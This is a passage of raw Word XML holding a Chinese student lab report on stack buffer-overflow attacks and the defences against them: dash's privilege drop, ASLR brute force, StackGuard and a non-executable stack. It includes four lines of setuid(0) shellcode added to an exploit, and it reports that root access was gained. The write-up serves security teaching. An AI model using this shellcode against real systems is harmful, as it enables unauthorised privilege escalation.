        </w:rPr>
        <w:t>起始位置即</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30B4B">
        <w:t>0xbfffea</w:t>
      </w:r>
      <w:r w:rsidR="003A72CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30B4B">
        <w:t>7+0x50=0xbfffea</w:t>
      </w:r>
      <w:r w:rsidR="003A72CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30B4B">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFED89" w14:textId="23386C99" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B"/>
    <w:p w14:paraId="1302E63E" w14:textId="662AD9CB" w:rsidR="00141302" w:rsidRDefault="00CE2DCB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过测试发现，当</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stack.</w:t>
      </w:r>
      <w:r>
        <w:t>c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buffer_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为24时，始终出现</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段错误</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE2DCB">
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE2DCB">
        <w:t>propertly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14F23F4E" w14:textId="1D4849DA" w:rsidR="00CE2DCB" w:rsidRDefault="00CE2DCB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当改为12后，攻击成功，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945E89D" w14:textId="3E4D0122" w:rsidR="00CE2DCB" w:rsidRPr="00CE2DCB" w:rsidRDefault="00CE2DC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ED9BB57" wp14:editId="1F0DED16">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-68580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="839470"/>
            <wp:effectExtent l="0" t="0" r="254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780"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="839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12BC9A9" w14:textId="6BF63685" w:rsidR="00141302" w:rsidRPr="005E5BEE" w:rsidRDefault="005E5BEE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E5BEE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task 3: Defeating dash’s Countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C426ED4" w14:textId="55515103" w:rsidR="005E5BEE" w:rsidRDefault="005E5BEE" w:rsidP="005E5BEE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将所给代码保存为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dash_shell_test.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3716FB4F" w14:textId="36EDD230" w:rsidR="00141302" w:rsidRDefault="00C478E6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3B19EBD" wp14:editId="4DC55677">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>250190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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07" b="32199"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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E5BEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当取消</w:t>
      </w:r>
      <w:r w:rsidR="00C22429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释所标代码时，编译执行结果如下，获取到了root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184EDCEE" w14:textId="38ECCE63" w:rsidR="00141302" w:rsidRDefault="00FD1763">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="566D720F" wp14:editId="547C440C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-45720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1842770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1517650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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637"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="151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22429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当继续注释时，编译执行结果如下，攻击失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB2057" w14:textId="082B3B88" w:rsidR="00141302" w:rsidRDefault="00141302"/>
    <w:p w14:paraId="702674A9" w14:textId="6C2669B1" w:rsidR="00141302" w:rsidRDefault="00DC5BE4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Task</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploit.</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的shellcode增加以下四条指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75439622" w14:textId="6EEE91C3" w:rsidR="00DC5BE4" w:rsidRDefault="00DC5BE4" w:rsidP="00DC5BE4">
      <w:r>
        <w:t xml:space="preserve">"\x31\xc0" /* Line 1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xorl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE38A31" w14:textId="53D729C1" w:rsidR="00DC5BE4" w:rsidRDefault="00DC5BE4" w:rsidP="00DC5BE4">
      <w:r>
        <w:t>"\x31\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" /* Line 2: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xorl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00394CC0" w14:textId="49A9F350" w:rsidR="00DC5BE4" w:rsidRDefault="00DC5BE4" w:rsidP="00DC5BE4">
      <w:r>
        <w:t xml:space="preserve">"\xb0\xd5" /* Line 3: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $0xd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>al */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B0BD9" w14:textId="517F6A57" w:rsidR="00DC5BE4" w:rsidRDefault="00DC5BE4" w:rsidP="00DC5BE4">
      <w:r>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x80" /* Line 4: int $0x80 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8B5CB" w14:textId="0C378751" w:rsidR="00FD1763" w:rsidRDefault="00FD1763" w:rsidP="00DC5BE4"/>
    <w:p w14:paraId="34E43396" w14:textId="75B37585" w:rsidR="00FD1763" w:rsidRDefault="00C478E6" w:rsidP="00DC5BE4"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7FF05B39" wp14:editId="11FAD3BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>274320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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559"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="14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D1763">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重复2中攻击，</w:t>
      </w:r>
      <w:r w:rsidR="00F07DF4" w:rsidRPr="00F07DF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F07DF4" w:rsidRPr="00F07DF4">
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F07DF4" w:rsidRPr="00F07DF4">
        <w:t>(0）</w:t>
      </w:r>
      <w:r w:rsidR="00851804">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00FD1763">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功获取root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179CF96" w14:textId="7904561E" w:rsidR="00FD1763" w:rsidRDefault="00FD1763" w:rsidP="00DC5BE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224EA756" w14:textId="48D8FA44" w:rsidR="00141302" w:rsidRDefault="00141302"/>
    <w:p w14:paraId="4705DBA5" w14:textId="46C813B8" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="04A95E54" w14:textId="3C1F439E" w:rsidR="00C478E6" w:rsidRPr="00E204EE" w:rsidRDefault="00E204EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E204EE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Defeating Address Randomization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F30C1" w14:textId="48C9338F" w:rsidR="00C478E6" w:rsidRDefault="00E204EE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将所给脚本保存为test</w:t>
      </w:r>
      <w:r>
        <w:t>.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并赋予可执行权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A6ED16" w14:textId="55BB92EA" w:rsidR="00E204EE" w:rsidRDefault="00E204EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71311E5F" wp14:editId="5019493F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5274310" cy="1211580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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374"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="121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1D75FD6" w14:textId="28CE839D" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="6B144A8B" w14:textId="4433A69F" w:rsidR="00C478E6" w:rsidRDefault="002A0A00"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2BB8605E" wp14:editId="6FE6C81F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>190500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3951605" cy="2964180"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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60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执行脚本，结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3C106" w14:textId="02E48EB5" w:rsidR="002A0A00" w:rsidRDefault="002A0A00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E321185" w14:textId="71622F12" w:rsidR="00C478E6" w:rsidRDefault="002A0A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终通过</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0A00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用暴力手段重复攻击漏洞程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功获取到了root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB4C571" w14:textId="504C7CA9" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="7D02238A" w14:textId="41B11865" w:rsidR="002A0A00" w:rsidRPr="002A0A00" w:rsidRDefault="002A0A00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0A00">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5: Turn on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A0A00">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A0A00">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C57DF" w14:textId="15435B85" w:rsidR="00C478E6" w:rsidRDefault="002A0A00"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 wp14:anchorId="38D97A21" wp14:editId="19F3BA2C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-274320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>274320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="254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878"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="111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首先，关闭地址随机化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D4E1EE" w14:textId="4C7C5060" w:rsidR="002A0A00" w:rsidRDefault="002A0A00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04BD98C2" w14:textId="643F537B" w:rsidR="00C478E6" w:rsidRDefault="00592B94">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00592B94">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00592B94">
        <w:t>的“Stack Guard”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制的前提下，重新编译运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stack.</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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exploit</w:t>
      </w:r>
      <w:r>
        <w:t>.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C727836" w14:textId="7FD2974D" w:rsidR="00592B94" w:rsidRDefault="00592B94">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D036E2A" w14:textId="77777777" w:rsidR="00592B94" w:rsidRDefault="00592B94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472905E1" w14:textId="651F27E1" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="4A36F9E2" w14:textId="22C46BD0" w:rsidR="00C478E6" w:rsidRDefault="00592B94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86C5FB3" wp14:editId="6468D544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5274310" cy="1074420"/>
            <wp:effectExtent l="0" t="0" r="254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37" b="39904"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="107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B0A39F8" w14:textId="345FD0E8" w:rsidR="00C478E6" w:rsidRDefault="00592B94">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看见，由于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保护机制，攻击失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282AD32" w14:textId="3195C543" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="22222036" w14:textId="006C2CC9" w:rsidR="002A0A00" w:rsidRPr="00592B94" w:rsidRDefault="00592B94">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00592B94">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task 6: Turn on the Non-executable Stack Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0AFCC5" w14:textId="72A3BDB5" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="2B9C2906" w14:textId="549BBF1B" w:rsidR="002A0A00" w:rsidRDefault="00592B94">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，关闭地址随机化，防止干扰</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF6412" w14:textId="0E6C8932" w:rsidR="00592B94" w:rsidRDefault="00592B94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 wp14:anchorId="74D8010D" wp14:editId="580F762A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5274310" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="254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071"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="527431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836E4F3" w14:textId="7925308C" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="6BE768D8" w14:textId="524D76A3" w:rsidR="002A0A00" w:rsidRDefault="00FB5A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A3D3FFE" wp14:editId="2EBB8876">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>274320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="254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02" b="57817"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="84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92B94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，关闭</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00592B94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00592B94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护，</w:t>
      </w:r>
      <w:r w:rsidR="00592B94" w:rsidRPr="00592B94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00592B94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00592B94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可执行</w:t>
      </w:r>
      <w:r w:rsidR="00592B94" w:rsidRPr="00592B94">
        <w:t>选项重新编译易受攻击的程序</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stack.</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EB84C48" w14:textId="6E79D0D5" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B796F69" w14:textId="30C919E1" w:rsidR="002A0A00" w:rsidRDefault="00FB5A5F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="317E8287" wp14:editId="3AB88144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4831080" cy="1877060"/>
            <wp:effectExtent l="0" t="0" r="7620" b="889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186"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4831080" cy="187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重复task</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的操作，得到结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E85E1A" w14:textId="576AA1AC" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="7A8F0D81" w14:textId="4A4765F4" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="49769508" w14:textId="23CCD409" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="6841FFEA" w14:textId="672EBB5E" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="6F37660F" w14:textId="3B535346" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="06AE67CB" w14:textId="569EA4FE" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F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E33DD96" wp14:editId="5D652A8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74310" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="254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38" b="40482"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="84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C058ADA" w14:textId="0AFE5A9F" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段不可</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行，在堆栈上运行shellcode的攻击同样失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE737E3" w14:textId="77777777" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683DA533" w14:textId="0EDAA92A" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="76498ED9" w14:textId="415C439B" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="58D85D73" w14:textId="0BA3C25B" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="51353CFB" w14:textId="6F1EEC9B" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="4C59238B" w14:textId="280D29F2" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="55003147" w14:textId="072365E4" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="600A94F6" w14:textId="752D6260" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="02FFB97D" w14:textId="277B97D3" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="4B7C41F6" w14:textId="1EEC10D0" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="5C2DCEAF" w14:textId="6AC57B1C" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="2AB13C36" w14:textId="6C5FBA9B" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="2F86C817" w14:textId="60B6F6E4" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
